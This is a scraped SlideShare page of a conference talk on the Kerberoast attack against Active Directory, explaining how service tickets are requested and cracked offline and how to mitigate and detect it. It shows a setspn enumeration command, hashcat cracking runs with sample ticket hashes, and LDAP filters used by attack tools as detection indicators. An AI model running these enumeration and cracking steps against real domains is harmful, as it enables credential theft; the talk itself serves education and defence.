SlideShare a Scribd company logo

In the Wake of Kerberoast

K
ken_kitahara

About Kerberoast attack and defense. Presentation at OWASP Sendai on 8th December (https://owaspsendai.connpass.com/event/230638/).

Technology
1 of 35
Download to read offline
In the Wake of Kerberoast Ken Kitahara 2021/12/08 @ OWASP Sendai
Background • In Active Directory Network Penetration Testing, password issues are serious problem. • Attackers and Penetration Testers want to get credentials: • Local Privilege Escalation • Lateral Movement • Domain Escalation • Attackers and Penetration Testers don't want to do online password cracking if not required: • Online password cracking is very noisy and increase likelihood of detection. • How can we get password hashes for offline cracking?
Advent of Kerberoast [Ref.] Attacking Kerberos - Kicking the Guard Dog of Hades • https://redsiege.com/kerberoast-slides (Slide) • https://www.youtube.com/watch?v=PUyhlN-E5MU (Video) • Presented by Tim Medin (@TimMedin) at SANS HackFest 2014. • Method to retrieve password hash for offline crack and to forge tickets. • Local Administrator privilege is not required :)
Kerberos Authentication Flow Domain Controller Application Server Client Computer (2) AS-REP (AS Reply) : The DC sends TGT for the requested user account to the client. TGT (1) AS-REQ (AS Request) : The client requests a TGT (Ticket Granting Ticket) for the user account to AS (Authentication Service) on the DC (Domain Controller).
Kerberos Authentication Flow Domain Controller Application Server Client Computer TGT ST (4) TGS-REP (TGS Reply) : The TGS on DC sends a ST for the requested service to the client. (3) TGS-REQ (TGS Request) : The client sends TGT and requests a ST (Service Ticket) for the application server to the TGS (Ticket Granting Service) on DC.
Kerberos Authentication Flow Domain Controller Application Server Client Computer (5) AP-REQ (Application Request) : The client sends ST and request authentication from the service on the application server. ST (6) AP-REP (Application Reply) : The server authenticates the client and grants access to the service.
Kerberos Tickets ❑ TGT (Ticket Granting Ticket) • Issued by AS (Authentication Service) in KDC (Key Distribution Center) on DC (Domain Controller). • Use to issue ST (Service Ticket). • Data is encrypted with hash value of krbtgt account. ❑ ST (Service Ticket) • Issued by TGS (Ticket Granting Service). • Use to authenticate service (File Server, Web Server, SQL Server, etc...) • Data is encrypted with hash value of service account. • To issue ST, client must be present TGT from AS. • [NOTE] In many security articles, TGS is used as a word to mean ST.
Data in The Tickets TGT / ST Username Session Key Expiration Time PAC (Optional) A ticket is encrypted with a key generated from a hash value: ❑ TGT • The key is derived from krbtgt account's NTLM hash. • krbtgt's NTLM is uncrackable :( ❑ ST • The key is derived from service owner account's NTLM hash. • If the service owner is Computer Account, NTLM is uncrackable :( • But what if the service owner is some domain account?
Kerberoast Overview Domain Controller Application Server Client Computer TGT ST $krb5tgs$23$*sqlsvc$co ntoso.local$MSSQLSvc/S QL01.contoso.local:143 3@contoso.local*$BB513 E29A412927A81C68973A0E E38F7$5B3C8A9497F374DC 9B21C70AB65E36D9...... Crack! TGS-REQ TGS-REP
Original Workflow for Kerberoast 1. An attacker authenticated as a domain user requests TGT to AS and gets TGT. 2. The attacker requests ST for target service to TGS and gets the ST. 3. Attacker extracts tickets from memory as file. 4. The attacker extracts a hash value from ST file. 5. The attacker cracks the hash value and gets plain text password. 6. [Optional] After cracking the password, we can forge ticket owner in the ST.
Requirements for Kerberoast • Authenticated as a domain user account. • A domain user account is set as a service account. • Target service is registered as a valid service to Kerberos server. • [Optional] For fast offline password cracking, it is preferable to use RC4 as the ticket encryption algorithm. • Kerberoast doesn't need to communicate with the target service. So, not required target server accessibility, availability and existence :)
Encryption Algorithms • Tickets are encrypted with RC4, AES128 or AES256. • User's NTLM hash is used as the encryption key. • If the ticket uses AES128 or AES256 as the encryption algorithm, a salt based on the account name is used. Account Type Format Example User Account <Domain's FQDN in Upper Case><Account Name in Lower Case> The salt for jeff@contoso.local is CONTOSO.LOCALjeff Computer Account <Domain's FQDN in Upper Case>host<Account Name in Lower Case> The salt for pc01.contoso.local is CONTOSO.LOCALhostpc01.co ntoso.local
Enumeration • Services are managed by SPN (Service Principal Name). • SPN is a key component of Kerberos authentication for realizing Single Sign-On. • Kerberos server (DC) verifies services with the SPN. • An SPN consists of service name, computer name, domain's FQDN, port number, service account name...... • Attackers can find targets for Kerberoast by enumerating SPN records. • Find SPNs with a domain user account set as the owner of the service. • SPNs can enumerate with setspn.exe command. It uses LDAP query. • Direct LDAP search can be also used for finding targets. MSSQLSvc/dbsrv.domain.local:1433/CN=dbadmin,OU=SrvAdms,DC=domain,DC=local
Enumeration : setspn.exe C:>setspn -T contoso.local -Q */* Checking domain DC=contoso,DC=local --snip-- CN=CL01,CN=Computers,DC=contoso,DC=local RestrictedKrbHost/CL01 HOST/CL01 --snip-- CN=sqlsvc,CN=Users,DC=contoso,DC=local MSSQLSvc/SQL01.contoso.local:1433 Existing SPN found! This SPN record indicates: • Domain user account contososqlsvc manages SQL Server on SQL01.contoso.local. • Attackers can retrieve Kerberos format hash from ST.
Enumeration : LDAP Search
Obtain Service Tickets
Extract Service Ticket
Offline Password Crack
Password Crack Tool's Support • John the Ripper is added support for KRB5TGS format in September 2015. • Hashcat is added support for KRB5TGS format in February 2016.
Invoke-Kerberoast • If possible, attackers and Penetration Testers don't want to create files. • Will Schroeder (@harmj0y) released Invoke-Kerberoast in November 2016. • It is a PowerShell Script and can retrieve KRG5TGS format hash without creating ticket file.
Tools for Kerberoast Tool Description kerberoast • Original tools for Kerberoast by Tim Medin. • Python Scripts. • Service Tickets need to be output as files. • Can also extract Service Tickets from pcap files. Invoke-Kerberoast • PowerShell script by Will Schroeder. • All operations can be executed in memory. Rubeus • C# toolset for Kerberos-related attacks by Will Schroeder. • The tool that is probably the most used today in Kerberos-related attacks.
Real World Cases • APT29 (a cyber espionage group with alleged ties to Russia) obtained Service Ticket for Kerberoast. • FIN7 (a financially-motivated threat group) used Kerberoast for credential access. • Operation Wacao (a China-based cyber espionage adversary) used Invoke- Kerberoast to request encrypted Service Tickets. • Wizard Spider (a Russia-based financially-motivated threat group) used Rubeus, Mimikatz and Invoke-Kerberoast for credential access. [Ref.] MITRE ATT&CK - Steal or Forge Kerberos Tickets: Kerberoasting • https://attack.mitre.org/techniques/T1558/003/
Mitigation • Ensure strong password length (ideally 25+ characters) and complexity for service accounts : Mitigation for offline password cracking. Strong passwords make it difficult to crack passwords in a realistic amount of time. • Enable Kerberos encryption, stronger than RC4, and update DC to Windows Server 2019 or newer version : Mitigation for offline password cracking. Strong encryption methods make slower the speed of offline password cracking. • Limit service account privilege : This is a mitigation for lateral movement.
Encryption Method in Kerberos etype Encryption Type 16 (0x10) des3-cbc-sha-1 17 (0x11) aes128-cts-hmac-sha1-96 18 (0x12) aes256-cts-hmac-sha1-96 19 (0x13) aes128-cts-hmac-sha384-192 20 (0x14) aes256-cts-hmac-sha384-192 23 (0x17) rc4-hmac / rc4-hmac-md5 • Kerberos supports many encryption methods for encrypting data in tickets. • In Active Directory, the default encryption method is rc4-hmac (etype = 23)
Enable Strong Encryption Method • AES128 / AES256 can be enabled with following procedure in DC: 1. Open [Active Directory Users and Computers] 2. Open Properties for the service account. 3. In [Account] tab, check following lines in [Account options] section: • This account supports Kerberos AES128 bit encryption. • This account supports Kerberos AES256 bit encryption. • This mitigation can be bypassed if DC is prior to Windows Server 2019, but it is useful for detection.
Speed Measurement (RC4) ┌──(kali㉿kali)-[~] └─$ hashcat -m 13100 -r nsa-rules/nsa64.rule sqlsvc-rc4.txt rockyou.txt --snip-- $krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc --snip-- 510ff11:Password123! Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, TGS-REP Hash.Target......: $krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc/SQL01.co...10ff11 Time.Started.....: Tue Dec 7 06:12:39 2021 (2 secs) Time.Estimated...: Tue Dec 7 06:12:41 2021 (0 secs) OS : Kali Linux on VMware (Number of CPU : 2, Number of Core : 1, RAM: 2GB) Password Dictionary : rockyou.txt Rule : nsa-rules/nsa64.rule
Speed Measurement (AES256) ┌──(kali㉿kali)-[~] └─$ hashcat -m 19700 -r nsa-rules/nsa64.rule sqlsvc-aes256.txt rockyou.txt --snip-- $krb5tgs$18$sqlsvc$contoso.local$9aa3fdc96 --snip-- a793c4f:Password123! Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 18, TGS-REP Hash.Target......: $krb5tgs$18$sqlsvc$contoso.local$9aa3fdc96a0caeb244...793c4f Time.Started.....: Tue Dec 7 06:14:13 2021 (7 mins, 48 secs) Time.Estimated...: Tue Dec 7 06:22:01 2021 (0 secs) OS : Kali Linux on VMware (Number of CPU : 2, Number of Core : 1, RAM: 2GB) Password Dictionary : rockyou.txt Rule : nsa-rules/nsa64.rule
Detection : Enumeration Tool Common LDAP Filter setspn.exe (servicePrincipalName=*/*) Invoke-Kerberoast (&(samAccountType=805306368)(servicePrincipalName=*)) Rubeus (&(samAccountType=805306368)(serviceprincipalname=*)(! samAccountName=krbtgt)(|(!msds- supportedencryptiontypes=*)(msds- supportedencryptiontypes=0)(msds- supportedencryptiontypes:1.2.840.113556.1.4.803:=4))) • Most of tools for Kerberoast, enumerate target with LDAP query. • LDAP filter servicePrincipalName=* is not usually considered to occur, so this would be a good indicator for hunting Kerberoast. • This detection can be bypassed, but it is a good way to prevent script kiddies.
Detection : Enumeration • LDAP query logging is not enabled by default. • To enable LDAP query logging, set HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNTDSDiagnostics 15 Field Engineering registry key to a value 1 between 5. The larger the number, the higher the level of detail. • After setting the registry, LDAP query should be appeared as ID 1644 in Directory Service under Applications and Services Logs from Event Viewer.
Detection : Enumeration Logging threshold value should be optimized. It is controlled by registry values under HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNTDSParameters. If don't set it, default value is applied: ❑ Expensive Search Results Threshold DWORD. Default value is 10,000. Log when more entries than this value are retrieved. ❑ Inefficient Search Results Threshold DWORD. Default value is 1,000. Log when more entries than this value are searched and fewer than 10 % of the results are returned. ❑ Search Time Threshold (msecs) DWORD. Default value is 30,000. Log any operation that exceeds this value (in milliseconds).
Detection : Enumeration This example is generated by Rubeus.exe: ❑ (sAMAccountType=805306368) Listing all User objects. ❑ (servicePrincipalName=*) Listing all objects have SPN. ❑ (!(sAMAccountName=krbtgt)) Exclude krbtgt user account. ❑ (!(userAccountControl&2)) Exclude disabled user.
Detection : Ticket Request • TGS-REQ raises an event with ID 4769 in the Security under Windows Logs. • If the number of application services is large, Kerberoast tools generate the number of TGS-REQs in short time, so this can be a good indicator. • However, in general, a large number of TGS-REQs are generated :(
Detection : Honeypot Service • TGS-REQs are always generated in domain network, so it may be hard to find which is the attacker's request. • [A Solution] Setup Honeypot Account and Honeypot Service. • Configure fake service account and fake SPN. • If attackers send TGS-REQ to the Honey Service, the attacker's intrusion can be detected.
Detection : Encryption Type • In TGS-REQ for Kerberoasting, attackers will try to downgrade attack for fast offline cracking. • If strong encryption methods rather than RC4 is configured, Ticket Encryption Type field in event logs can be used for detecting attacker's activities. 0x17 (= 23, rc4-hmac) indicates rc4- hmac were used, and the attacker performed downgrade attack.
Summary • Kerberoast is the technique to get password hash for offline crack. • To mitigate the attacks, ensuring strong password, enabling strong encryption algorithms and restricting privileges for service accounts. • Methods such as LDAP query logging and Honeypot service is useful for attacker's activity detection.

Recommended

State of the ATT&CK
State of the ATT&CKState of the ATT&CK
State of the ATT&CKMITRE ATT&CK
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Frameworkn|u - The Open Security Community
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...MITRE ATT&CK
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKMITRE ATT&CK
 
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...MITRE - ATT&CKcon
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
 

Recommended

State of the ATT&CK
State of the ATT&CKState of the ATT&CK
State of the ATT&CKMITRE ATT&CK
 
MITRE ATT&CK Framework
MITRE ATT&CK FrameworkMITRE ATT&CK Framework
MITRE ATT&CK Frameworkn|u - The Open Security Community
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...MITRE ATT&CK
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKMITRE ATT&CK
 
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...MITRE - ATT&CKcon
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, TripwireMITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, TripwireMITRE - ATT&CKcon
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK frameworkBhushan Gurav
 
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamWhat is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamMITRE ATT&CK
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptxVivek Chauhan
 
Threat Hunting Platforms (Collaboration with SANS Institute)
Threat Hunting Platforms (Collaboration with SANS Institute)Threat Hunting Platforms (Collaboration with SANS Institute)
Threat Hunting Platforms (Collaboration with SANS Institute)Sqrrl
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]David Sweigert
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber worldAkash Sarode
 
Transforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionTransforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionMITRE - ATT&CKcon
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKMITRE ATT&CK
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Detecting modern PowerShell attacks with SIEM
Detecting modern PowerShell attacks with SIEMDetecting modern PowerShell attacks with SIEM
Detecting modern PowerShell attacks with SIEMJustin Henderson
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE - ATT&CKcon
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Christopher Korban
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedWill Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 

More Related Content

What's hot

VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, TripwireMITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, TripwireMITRE - ATT&CKcon
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK frameworkBhushan Gurav
 
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamWhat is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamMITRE ATT&CK
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptxVivek Chauhan
 
Threat Hunting Platforms (Collaboration with SANS Institute)
Threat Hunting Platforms (Collaboration with SANS Institute)Threat Hunting Platforms (Collaboration with SANS Institute)
Threat Hunting Platforms (Collaboration with SANS Institute)Sqrrl
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]David Sweigert
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber worldAkash Sarode
 
Transforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionTransforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionMITRE - ATT&CKcon
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKMITRE ATT&CK
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Detecting modern PowerShell attacks with SIEM
Detecting modern PowerShell attacks with SIEMDetecting modern PowerShell attacks with SIEM
Detecting modern PowerShell attacks with SIEMJustin Henderson
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE - ATT&CKcon
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Christopher Korban
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 

What's hot (20)

VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, TripwireMITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
 
MITRE ATT&CK framework
MITRE ATT&CK frameworkMITRE ATT&CK framework
MITRE ATT&CK framework
 
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red TeamWhat is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
Cyber Kill Chain.pptx
Cyber Kill Chain.pptxCyber Kill Chain.pptx
Cyber Kill Chain.pptx
 
Threat Hunting Platforms (Collaboration with SANS Institute)
Threat Hunting Platforms (Collaboration with SANS Institute)Threat Hunting Platforms (Collaboration with SANS Institute)
Threat Hunting Platforms (Collaboration with SANS Institute)
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber world
 
Transforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis QuestionTransforming Adversary Emulation Into a Data Analysis Question
Transforming Adversary Emulation Into a Data Analysis Question
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CK
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Detecting modern PowerShell attacks with SIEM
Detecting modern PowerShell attacks with SIEMDetecting modern PowerShell attacks with SIEM
Detecting modern PowerShell attacks with SIEM
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common Language
 

Similar to In the Wake of Kerberoast

SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedWill Schroeder
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseDEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseFelipe Prado
 
SPS Ozarks 2012: Kerberos Survival Guide
SPS Ozarks 2012: Kerberos Survival GuideSPS Ozarks 2012: Kerberos Survival Guide
SPS Ozarks 2012: Kerberos Survival GuideJ.D. Wade
 
Kerberos survival guide
Kerberos survival guideKerberos survival guide
Kerberos survival guideJ.D. Wade
 
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOSWalking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOS
Walking the Bifrost: An Operator's Guide to Heimdal & Kerberos on macOSCody Thomas
 
Kerberos survival guide-STL 2015
Kerberos survival guide-STL 2015Kerberos survival guide-STL 2015
Kerberos survival guide-STL 2015J.D. Wade
 
Kerberos Survival Guide - St. Louis Day of .Net
Kerberos Survival Guide - St. Louis Day of .NetKerberos Survival Guide - St. Louis Day of .Net
Kerberos Survival Guide - St. Louis Day of .NetJ.D. Wade
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]RootedCON
 
Kerberos Survival Guide: SharePoint Saturday Nashville 2015
Kerberos Survival Guide: SharePoint Saturday Nashville 2015Kerberos Survival Guide: SharePoint Saturday Nashville 2015
Kerberos Survival Guide: SharePoint Saturday Nashville 2015J.D. Wade
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Kerberos Survival Guide: Columbus 2015
Kerberos Survival Guide: Columbus 2015Kerberos Survival Guide: Columbus 2015
Kerberos Survival Guide: Columbus 2015J.D. Wade
 
Kerberos Survival Guide: SharePointalooza
